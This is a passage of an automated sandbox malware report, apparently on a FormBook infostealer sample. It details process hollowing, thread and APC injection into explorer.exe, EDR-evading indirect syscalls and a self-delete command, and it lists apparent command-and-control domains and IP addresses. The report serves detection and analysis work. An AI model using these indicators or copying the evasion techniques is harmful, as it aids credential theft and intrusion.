          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5CBF0 mov eax, dword ptr fs:[00000030h]3_2_01A5CBF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FEBFC mov eax, dword ptr fs:[00000030h]3_2_019FEBFC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8BF0 mov eax, dword ptr fs:[00000030h]3_2_019D8BF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8BF0 mov eax, dword ptr fs:[00000030h]3_2_019D8BF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8BF0 mov eax, dword ptr fs:[00000030h]3_2_019D8BF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7EBD0 mov eax, dword ptr fs:[00000030h]3_2_01A7EBD0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A98B28 mov eax, dword ptr fs:[00000030h]3_2_01A98B28
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A98B28 mov eax, dword ptr fs:[00000030h]3_2_01A98B28
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4B00 mov eax, dword ptr fs:[00000030h]3_2_01AA4B00
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]3_2_01A4EB1D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FEB20 mov eax, dword ptr fs:[00000030h]3_2_019FEB20
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FEB20 mov eax, dword ptr fs:[00000030h]3_2_019FEB20
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C8B50 mov eax, dword ptr fs:[00000030h]3_2_019C8B50
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CCB7E mov eax, dword ptr fs:[00000030h]3_2_019CCB7E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A84B4B mov eax, dword ptr fs:[00000030h]3_2_01A84B4B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A84B4B mov eax, dword ptr fs:[00000030h]3_2_01A84B4B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A78B42 mov eax, dword ptr fs:[00000030h]3_2_01A78B42
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A66B40 mov eax, dword ptr fs:[00000030h]3_2_01A66B40
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A66B40 mov eax, dword ptr fs:[00000030h]3_2_01A66B40
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9AB40 mov eax, dword ptr fs:[00000030h]3_2_01A9AB40
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7EB50 mov eax, dword ptr fs:[00000030h]3_2_01A7EB50
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]3_2_01AA2B57
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]3_2_01AA2B57
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]3_2_01AA2B57
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]3_2_01AA2B57
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A26AA4 mov eax, dword ptr fs:[00000030h]3_2_01A26AA4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]3_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA4A80 mov eax, dword ptr fs:[00000030h]3_2_01AA4A80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A08A90 mov edx, dword ptr fs:[00000030h]3_2_01A08A90
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8AA0 mov eax, dword ptr fs:[00000030h]3_2_019D8AA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D8AA0 mov eax, dword ptr fs:[00000030h]3_2_019D8AA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0AD0 mov eax, dword ptr fs:[00000030h]3_2_019D0AD0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0AAEE mov eax, dword ptr fs:[00000030h]3_2_01A0AAEE
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0AAEE mov eax, dword ptr fs:[00000030h]3_2_01A0AAEE
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A26ACC mov eax, dword ptr fs:[00000030h]3_2_01A26ACC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A26ACC mov eax, dword ptr fs:[00000030h]3_2_01A26ACC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A26ACC mov eax, dword ptr fs:[00000030h]3_2_01A26ACC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A04AD0 mov eax, dword ptr fs:[00000030h]3_2_01A04AD0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A04AD0 mov eax, dword ptr fs:[00000030h]3_2_01A04AD0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0CA24 mov eax, dword ptr fs:[00000030h]3_2_01A0CA24
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0CA38 mov eax, dword ptr fs:[00000030h]3_2_01A0CA38
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F4A35 mov eax, dword ptr fs:[00000030h]3_2_019F4A35
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F4A35 mov eax, dword ptr fs:[00000030h]3_2_019F4A35
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FEA2E mov eax, dword ptr fs:[00000030h]3_2_019FEA2E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5CA11 mov eax, dword ptr fs:[00000030h]3_2_01A5CA11
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0A5B mov eax, dword ptr fs:[00000030h]3_2_019E0A5B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0A5B mov eax, dword ptr fs:[00000030h]3_2_019E0A5B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7EA60 mov eax, dword ptr fs:[00000030h]3_2_01A7EA60
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D6A50 mov eax, dword ptr fs:[00000030h]3_2_019D6A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEE653 GetProcessHeap,GetLastError,HeapFree,GetLastError,5_2_00FEE653
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FF0063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00FF0063
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEFD20 SetUnhandledExceptionFilter,5_2_00FEFD20
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.30.212 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 128.1.131.130 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.204.100.23 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.83.55.173 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.8.70.95 80Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeNtClose: Indirect: 0x1CFA56C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeNtQueueApcThread: Indirect: 0x1CFA4F2Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMemory written: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: FE0000Jump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000003.3098476432.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3098065936.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2004994138.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.2003135790.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4450083102.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.4449069859.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2002630977.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeQueries volume information: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEFF45 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00FEFF45
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,5_2_00FEF160

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Access Token Manipulation          		1
          Abuse Elevation Control Mechanism          		Security Account Manager213
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
          Process Injection          		4
          Obfuscated Files or Information          		NTDS231
          Security Software Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp          		Cached Domain Credentials41
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Rootkit          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Masquerading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task612
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467706 Sample: tYEY1UeurGz0Mjb.exe Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 31 www.mrwine.xyz 2->31 33 www.cfuhtkwo.xyz 2->33 35 16 other IPs or domains 2->35 43 Snort IDS alert for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 51 9 other signatures 2->51 11 tYEY1UeurGz0Mjb.exe 3 2->11         started        signatures3 49 Performs DNS queries to domains with low reputation 33->49 process4 file5 29 C:\Users\user\...\tYEY1UeurGz0Mjb.exe.log, ASCII 11->29 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 67 Switches to a custom stack to bypass stack traces 11->67 15 tYEY1UeurGz0Mjb.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 2 other signatures 15->75 18 explorer.exe 101 1 15->18 injected process9 dnsIp10 37 021562413z.greycdn.net 128.1.131.130, 49723, 80 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States 18->37 39 www.cpuk-finance.com 185.151.30.212, 49719, 80 TWENTYIGB United Kingdom 18->39 41 7 other IPs or domains 18->41 53 System process connects to network (likely due to code injection or exploit) 18->53 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 61 Switches to a custom stack to bypass stack traces 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          tYEY1UeurGz0Mjb.exe32%ReversingLabs
          tYEY1UeurGz0Mjb.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://excel.office.com0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          http://www.byfchfyr.xyzReferer:0%Avira URL Cloudsafe
          http://www.whysco.com0%Avira URL Cloudsafe
          http://www.txglobedev.com/dy13/www.whysco.com0%Avira URL Cloudsafe
          http://www.jesuscrewofficial.com/dy13/0%Avira URL Cloudsafe
          http://www.520yhy.com0%Avira URL Cloudsafe
          http://www.yr8gl32.vip0%Avira URL Cloudsafe
          http://www.byfchfyr.xyz0%Avira URL Cloudsafe
          http://www.nestormediaproduction.com/dy13/0%Avira URL Cloudsafe
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
          https://word.office.comon0%Avira URL Cloudsafe
          http://www.yr8gl32.vip/dy13/www.cfuhtkwo.xyz0%Avira URL Cloudsafe
          http://www.cioncarp4213.com/dy13/0%Avira URL Cloudsafe
          http://www.520yhy.com/dy13/0%Avira URL Cloudsafe
          http://www.cpuk-finance.comReferer:0%Avira URL Cloudsafe
          http://www.cfuhtkwo.xyz/dy13/0%Avira URL Cloudsafe
          http://www.yr8gl32.vipReferer:0%Avira URL Cloudsafe
          http://www.cpuk-finance.com/dy13/www.nearmeacupuncture.com0%Avira URL Cloudsafe
          http://www.bum-arch.com0%Avira URL Cloudsafe
          http://www.northshorehousekeeping.com/dy13/f0%Avira URL Cloudsafe
          http://www.cioncarp4213.com0%Avira URL Cloudsafe
          http://www.nestormediaproduction.comReferer:0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
          http://www.cpuk-finance.com0%Avira URL Cloudsafe
          http://www.bum-arch.com/dy13/www.northshorehousekeeping.com0%Avira URL Cloudsafe
          http://www.whysco.com/dy13/www.jesuscrewofficial.com0%Avira URL Cloudsafe
          http://www.serco2020.com/dy13/www.mrwine.xyz0%Avira URL Cloudsafe
          http://www.nestormediaproduction.com0%Avira URL Cloudsafe
          https://wns.windows.com/)s0%Avira URL Cloudsafe
          http://www.yr8gl32.vip/dy13/0%Avira URL Cloudsafe
          http://www.bum-arch.com/dy13/0%Avira URL Cloudsafe
          http://www.mrwine.xyz/dy13/0%Avira URL Cloudsafe
          http://www.nearmeacupuncture.com0%Avira URL Cloudsafe
          http://www.northshorehousekeeping.com/dy13/0%Avira URL Cloudsafe
          http://www.nearmeacupuncture.com/dy13/0%Avira URL Cloudsafe
          http://www.nearmeacupuncture.com/dy13/www.serco2020.com0%Avira URL Cloudsafe
          http://www.tyupok.xyz0%Avira URL Cloudsafe
          http://www.mrwine.xyz0%Avira URL Cloudsafe
          http://www.byfchfyr.xyz/dy13/www.txglobedev.com0%Avira URL Cloudsafe
          http://www.byfchfyr.xyz/dy13/0%Avira URL Cloudsafe
          http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.com0%Avira URL Cloudsafe
          http://www.cioncarp4213.com/dy13/www.520yhy.com0%Avira URL Cloudsafe
          http://www.cfuhtkwo.xyzReferer:0%Avira URL Cloudsafe
          http://www.tyupok.xyzReferer:0%Avira URL Cloudsafe
          http://www.mrwine.xyzReferer:0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.cioncarp4213.comReferer:0%Avira URL Cloudsafe
          http://www.bum-arch.comReferer:0%Avira URL Cloudsafe
          http://www.northshorehousekeeping.com0%Avira URL Cloudsafe
          http://www.jesuscrewofficial.com0%Avira URL Cloudsafe
          http://www.520yhy.com/dy13/www.byfchfyr.xyz0%Avira URL Cloudsafe
          http://www.520yhy.comReferer:0%Avira URL Cloudsafe
          http://www.whysco.com/dy13/0%Avira URL Cloudsafe
          http://www.serco2020.com/dy13/0%Avira URL Cloudsafe
          http://www.serco2020.comReferer:0%Avira URL Cloudsafe
          http://www.jesuscrewofficial.comReferer:0%Avira URL Cloudsafe
          http://www.tyupok.xyz/dy13/0%Avira URL Cloudsafe
          http://www.cfuhtkwo.xyz0%Avira URL Cloudsafe
          http://www.txglobedev.comReferer:0%Avira URL Cloudsafe
          http://www.northshorehousekeeping.comReferer:0%Avira URL Cloudsafe
